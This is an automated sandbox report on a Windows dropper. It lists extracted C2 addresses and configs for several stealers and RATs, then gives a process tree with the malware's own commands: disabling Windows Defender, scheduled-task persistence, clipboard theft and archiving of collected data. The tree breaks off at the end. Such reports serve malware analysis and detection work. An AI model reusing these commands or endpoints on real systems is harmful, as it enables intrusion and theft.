Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 23:51

General

  • Target

    74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe

  • Size

    7.0MB

  • MD5

    200de062afe380d5cfd657c1678d3076

  • SHA1

    a0eaa751966264d5f38e852e43aaa6899d141a7c

  • SHA256

    74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51

  • SHA512

    8dcb05f0c48487780ea007e01afa77246ff7ea64024334c3bd5ac69e923a4fad9dfe27117613200a6dd1f898da6a8e7f560c79f077ef33ed8866d47ae0ade1d0

  • SSDEEP

    196608:HlIyLfShvOJiSUjLbmqyOVqdBtU4HRgYovRiFP9VfdE:FIyLLCjL67O8dBtFxg9QnFS

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:8080

101.99.92.189:8080

Mutex

d5gQ6Zf7Tzih1Pi1

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • VenomRAT 2 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • XMRig Miner payload 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 24 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 14 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe
    "C:\Users\Admin\AppData\Local\Temp\74353c3a81ce1d692ac70fb74607a05c8bee2f2e08a524de8222c1f0be935f51.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:556
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\U0w71.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\U0w71.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W5n58.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W5n58.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J17p1.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J17p1.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Users\Admin\AppData\Local\Temp\1013561001\C1J7SVw.exe
              "C:\Users\Admin\AppData\Local\Temp\1013561001\C1J7SVw.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5064
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3176
                • C:\Windows\system32\mode.com
                  mode 65,10
                  8⤵
                    PID:4960
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3196
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_7.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3360
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_6.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4680
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_5.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5100
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_4.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1508
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_3.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1756
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_2.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2152
                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                    7z.exe e extracted/file_1.zip -oextracted
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3316
                  • C:\Windows\system32\attrib.exe
                    attrib +H "in.exe"
                    8⤵
                    • Views/modifies file attributes
                    PID:3432
                  • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                    "in.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3824
                    • C:\Windows\SYSTEM32\attrib.exe
                      attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      9⤵
                      • Views/modifies file attributes
                      PID:2128
                    • C:\Windows\SYSTEM32\attrib.exe
                      attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      9⤵
                      • Views/modifies file attributes
                      PID:4428
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      9⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:408
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell ping 127.0.0.1; del in.exe
                      9⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3060
                      • C:\Windows\system32\PING.EXE
                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                        10⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:3184
              • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
                "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3368
              • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
                "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1080
              • C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe
                "C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4236
              • C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe
                "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:2128
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe" & rd /s /q "C:\ProgramData\UAS0ZM7Y5XBA" & exit
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:3736
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 10
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:2484
              • C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe
                "C:\Users\Admin\AppData\Local\Temp\1013829001\9feskIx.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: AddClipboardFormatListener
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:3644
                • C:\Users\Admin\AppData\Local\Temp\tpwnww.exe
                  "C:\Users\Admin\AppData\Local\Temp\tpwnww.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2396
                  • C:\Users\Admin\AppData\Local\Temp\tpwnww.exe
                    "C:\Users\Admin\AppData\Local\Temp\tpwnww.exe"
                    8⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3316
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tpwnww.exe'"
                      9⤵
                        PID:5512
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tpwnww.exe'
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:6716
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        9⤵
                          PID:5524
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                            10⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6612
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          9⤵
                            PID:6128
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              10⤵
                              • Enumerates processes with tasklist
                              PID:6592
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            9⤵
                              PID:6160
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                10⤵
                                • Enumerates processes with tasklist
                                PID:6656
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                              9⤵
                                PID:320
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  10⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6584
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                9⤵
                                • Clipboard Data
                                PID:2728
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-Clipboard
                                  10⤵
                                  • Clipboard Data
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:6752
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                9⤵
                                  PID:4548
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    10⤵
                                    • Enumerates processes with tasklist
                                    PID:7076
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  9⤵
                                    PID:3540
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      10⤵
                                        PID:7064
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "systeminfo"
                                      9⤵
                                        PID:6308
                                        • C:\Windows\system32\systeminfo.exe
                                          systeminfo
                                          10⤵
                                          • Gathers system information
                                          PID:7100
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                        9⤵
                                          PID:6232
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                            10⤵
                                              PID:7092
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            9⤵
                                              PID:5172
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                10⤵
                                                  PID:5760
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                9⤵
                                                  PID:5744
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    10⤵
                                                      PID:2484
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                    9⤵
                                                      PID:5072
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                        10⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:3628
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      9⤵
                                                        PID:6228
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          10⤵
                                                            PID:6468
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          9⤵
                                                            PID:6484
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              10⤵
                                                                PID:6972
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                              9⤵
                                                                PID:6620
                                                                • C:\Windows\system32\attrib.exe
                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                  10⤵
                                                                  • Drops file in Drivers directory
                                                                  • Views/modifies file attributes
                                                                  PID:6860
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                9⤵
                                                                  PID:6948
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    10⤵
                                                                      PID:5068
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                    9⤵
                                                                      PID:6792
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        tasklist /FO LIST
                                                                        10⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:4300
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3048"
                                                                      9⤵
                                                                        PID:3536
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /F /PID 3048
                                                                          10⤵
                                                                          • Kills process with taskkill
                                                                          PID:6236
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"
                                                                        9⤵
                                                                          PID:5572
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /F /PID 4088
                                                                            10⤵
                                                                            • Kills process with taskkill
                                                                            PID:7056
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3984"
                                                                          9⤵
                                                                            PID:6244
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /F /PID 3984
                                                                              10⤵
                                                                              • Kills process with taskkill
                                                                              PID:6716
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2864"
                                                                            9⤵
                                                                              PID:6032
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /F /PID 2864
                                                                                10⤵
                                                                                • Kills process with taskkill
                                                                                PID:5520
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1844"
                                                                              9⤵
                                                                                PID:5460
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /F /PID 1844
                                                                                  10⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:6452
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6956"
                                                                                9⤵
                                                                                  PID:6356
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /F /PID 6956
                                                                                    10⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:6372
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5704"
                                                                                  9⤵
                                                                                    PID:7140
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /F /PID 5704
                                                                                      10⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5664
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5716"
                                                                                    9⤵
                                                                                      PID:6776
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /F /PID 5716
                                                                                        10⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2472
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5728"
                                                                                      9⤵
                                                                                        PID:4760
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /F /PID 5728
                                                                                          10⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:384
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                                        9⤵
                                                                                          PID:4700
                                                                                          • C:\Windows\system32\getmac.exe
                                                                                            getmac
                                                                                            10⤵
                                                                                              PID:1820
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\izxiX.zip" *"
                                                                                            9⤵
                                                                                              PID:6972
                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\izxiX.zip" *
                                                                                                10⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6460
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                              9⤵
                                                                                                PID:6952
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic os get Caption
                                                                                                  10⤵
                                                                                                    PID:1976
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                  9⤵
                                                                                                    PID:6948
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic computersystem get totalphysicalmemory
                                                                                                      10⤵
                                                                                                        PID:1564
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                      9⤵
                                                                                                        PID:5388
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get uuid
                                                                                                          10⤵
                                                                                                            PID:6660
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                          9⤵
                                                                                                            PID:5412
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                              10⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:5356
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                            9⤵
                                                                                                              PID:5636
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic path win32_VideoController get name
                                                                                                                10⤵
                                                                                                                • Detects videocard installed
                                                                                                                PID:4812
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                              9⤵
                                                                                                                PID:2140
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                  10⤵
                                                                                                                    PID:1524
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 3024
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:1040
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1013851001\e1c8ef5647.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1013851001\e1c8ef5647.exe"
                                                                                                            6⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Identifies Wine through registry keys
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4048
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 780
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4408
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1013852001\fa0db471c4.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1013852001\fa0db471c4.exe"
